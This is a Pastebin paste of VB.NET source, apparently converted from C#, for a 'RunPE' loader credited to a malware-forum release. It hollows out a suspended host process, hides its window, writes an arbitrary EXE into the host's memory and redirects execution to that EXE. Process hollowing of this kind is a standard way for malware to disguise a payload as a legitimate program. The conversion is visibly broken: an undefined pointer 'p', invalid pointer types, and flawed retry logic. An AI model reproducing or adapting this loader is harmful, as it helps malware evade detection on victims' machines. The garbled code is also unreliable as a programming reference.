Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Imports System.Runtime.InteropServices
- '
- ' * Title: CMemoryExecute.cs
- ' * Description: Runs an EXE in memory using native WinAPI. Very optimized and tiny.
- ' *
- ' * Developed by: affixiate
- ' * Release date: December 10, 2010
- ' * Released on: http://opensc.ws
- ' * Credits:
- ' * MSDN (http://msdn.microsoft.com)
- ' * NtInternals (http://undocumented.ntinternals.net)
- ' * Pinvoke (http://pinvoke.net)
- ' *
- ' * Comments: If you use this code, I require you to give me credits. Don't be a ripper! ;]
- '
- ' ReSharper disable InconsistentNaming
- Public NotInheritable Class CMemoryExecute
- Private Sub New()
- End Sub
- Public Structure STARTUPINFO
- Public cb As UInteger
- Public lpReserved As String
- Public lpDesktop As String
- Public lpTitle As String
- Public dwX As UInteger
- Public dwY As UInteger
- Public dwXSize As UInteger
- Public dwYSize As UInteger
- Public dwXCountChars As UInteger
- Public dwYCountChars As UInteger
- Public dwFillAttribute As UInteger
- Public dwFlags As UInteger
- Public wShowWindow As Short
- Public cbReserved2 As Short
- Public lpReserved2 As IntPtr
- Public hStdInput As IntPtr
- Public hStdOutput As IntPtr
- Public hStdError As IntPtr
- End Structure
- ''' <summary>
- ''' Runs an EXE (which is loaded in a byte array) in memory.
- ''' </summary>
- ''' <param name="exeBuffer">The EXE buffer.</param>
- ''' <param name="hostProcess">Full path of the host process to run the buffer in.</param>
- ''' <param name="optionalArguments">Optional command line arguments.</param>
- ''' <returns></returns>
- Public Shared Function Run(exeBuffer As Byte(), hostProcess As String, Optional optionalArguments As String = "") As Boolean
- ' STARTUPINFO
- Dim StartupInfo As New STARTUPINFO()
- StartupInfo.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
- StartupInfo.wShowWindow = SW_HIDE
- Dim IMAGE_SECTION_HEADER = New Byte(39) {}
- ' pish
- Dim IMAGE_NT_HEADERS = New Byte(247) {}
- ' pinh
- Dim IMAGE_DOS_HEADER = New Byte(63) {}
- ' pidh
- Dim PROCESS_INFO = New Integer(3) {}
- ' pi
- Dim CONTEXT = New Byte(715) {}
- ' ctx
- Dim pish As Pointer(Of Byte)
- pish = p
- Dim pinh As Pointer(Of Byte)
- pinh = p
- Dim pidh As Pointer(Of Byte)
- pidh = p
- Dim ctx As Pointer(Of Byte)
- ctx = p
- ' Set the flag.
- ' ContextFlags
- CType(ctx + &H0, Pointer(Of UInteger)).Target = CONTEXT_FULL
- ' Get the DOS header of the EXE.
- Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length)
- ' Sanity check: See if we have MZ header.
- ' e_magic
- If CType(pidh + &H0, Pointer(Of UShort)).Target <> IMAGE_DOS_SIGNATURE Then
- Return False
- End If
- Dim e_lfanew = CType(pidh + &H3c, Pointer(Of Integer)).Target
- ' Get the NT header of the EXE.
- Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length)
- ' Sanity check: See if we have PE00 header.
- ' Signature
- If CType(pinh + &H0, Pointer(Of UInteger)).Target <> IMAGE_NT_SIGNATURE Then
- Return False
- End If
- ' Run with parameters if necessary.
- If Not String.IsNullOrEmpty(optionalArguments) Then
- hostProcess += Convert.ToString(" ") & optionalArguments
- End If
- If Not CreateProcess(Nothing, hostProcess, IntPtr.Zero, IntPtr.Zero, False, CREATE_SUSPENDED, _
- IntPtr.Zero, Nothing, StartupInfo, PROCESS_INFO) Then
- Return False
- End If
- Dim ImageBase = New IntPtr(CType(pinh + &H34, Pointer(Of Integer)).Target)
- ' pi.hProcess
- NtUnmapViewOfSection(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase)
- ' pi.hProcess
- ' SizeOfImage
- If VirtualAllocEx(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase, CType(pinh + &H50, Pointer(Of UInteger)).Target, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE) = IntPtr.Zero Then
- Run(exeBuffer, hostProcess, optionalArguments)
- End If
- ' Memory allocation failed; try again (this can happen in low memory situations)
- ' pi.hProcess
- ' SizeOfHeaders
- NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase, DirectCast(p, IntPtr), CType(pinh + 84, Pointer(Of UInteger)).Target, IntPtr.Zero)
- For i As UShort = 0 To CType(pinh + &H6, Pointer(Of UShort)).Target - 1
- ' NumberOfSections
- Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length)
- ' PointerToRawData
- ' pi.hProcess
- ' VirtualAddress
- ' SizeOfRawData
- NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), DirectCast(CInt(ImageBase) + CType(pish + &Hc, Pointer(Of UInteger)).Target, IntPtr), DirectCast(p, IntPtr), CType(pish + &H10, Pointer(Of UInteger)).Target, IntPtr.Zero)
- Next
- ' pi.hThread
- NtGetContextThread(DirectCast(PROCESS_INFO(1), IntPtr), DirectCast(ctx, IntPtr))
- ' pi.hProcess
- ' ecx
- NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), DirectCast(CType(ctx + &Hac, Pointer(Of UInteger)).Target, IntPtr), ImageBase, &H4, IntPtr.Zero)
- ' eax
- ' AddressOfEntryPoint
- CType(ctx + &Hb0, Pointer(Of UInteger)).Target = CUInt(ImageBase) + CType(pinh + &H28, Pointer(Of UInteger)).Target
- ' pi.hThread
- NtSetContextThread(DirectCast(PROCESS_INFO(1), IntPtr), DirectCast(ctx, IntPtr))
- ' pi.hThread
- NtResumeThread(DirectCast(PROCESS_INFO(1), IntPtr), IntPtr.Zero)
- Return True
- End Function
- #Region "WinNT Definitions"
- Private Const CONTEXT_FULL As UInteger = &H10007
- Private Const CREATE_SUSPENDED As Integer = &H4
- Private Const MEM_COMMIT As Integer = &H1000
- Private Const MEM_RESERVE As Integer = &H2000
- Private Const PAGE_EXECUTE_READWRITE As Integer = &H40
- Private Const IMAGE_DOS_SIGNATURE As UShort = &H5a4d
- ' MZ
- Private Const IMAGE_NT_SIGNATURE As UInteger = &H4550
- ' PE00
- Private Shared SW_SHOW As Short = 5
- Private Shared SW_HIDE As Short = 0
- Private Const STARTF_USESTDHANDLES As UInteger = &H100
- Private Const STARTF_USESHOWWINDOW As UInteger = &H1
- #Region "WinAPI"
- <DllImport("kernel32.dll", SetLastError := True)> _
- Private Shared Function CreateProcess(lpApplicationName As String, lpCommandLine As String, lpProcessAttributes As IntPtr, lpThreadAttributes As IntPtr, bInheritHandles As Boolean, dwCreationFlags As UInteger, _
- lpEnvironment As IntPtr, lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, lpProcessInfo As Integer()) As Boolean
- End Function
- <DllImport("kernel32.dll", SetLastError := True)> _
- Private Shared Function VirtualAllocEx(hProcess As IntPtr, lpAddress As IntPtr, dwSize As UInteger, flAllocationType As UInteger, flProtect As UInteger) As IntPtr
- End Function
- <DllImport("ntdll.dll", SetLastError := True)> _
- Private Shared Function NtUnmapViewOfSection(hProcess As IntPtr, lpBaseAddress As IntPtr) As UInteger
- End Function
- <DllImport("ntdll.dll", SetLastError := True)> _
- Private Shared Function NtWriteVirtualMemory(hProcess As IntPtr, lpBaseAddress As IntPtr, lpBuffer As IntPtr, nSize As UInteger, lpNumberOfBytesWritten As IntPtr) As Integer
- End Function
- <DllImport("ntdll.dll", SetLastError := True)> _
- Private Shared Function NtGetContextThread(hThread As IntPtr, lpContext As IntPtr) As Integer
- End Function
- <DllImport("ntdll.dll", SetLastError := True)> _
- Private Shared Function NtSetContextThread(hThread As IntPtr, lpContext As IntPtr) As Integer
- End Function
- <DllImport("ntdll.dll", SetLastError := True)> _
- Private Shared Function NtResumeThread(hThread As IntPtr, SuspendCount As IntPtr) As UInteger
- End Function
- #End Region
- #End Region
- End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement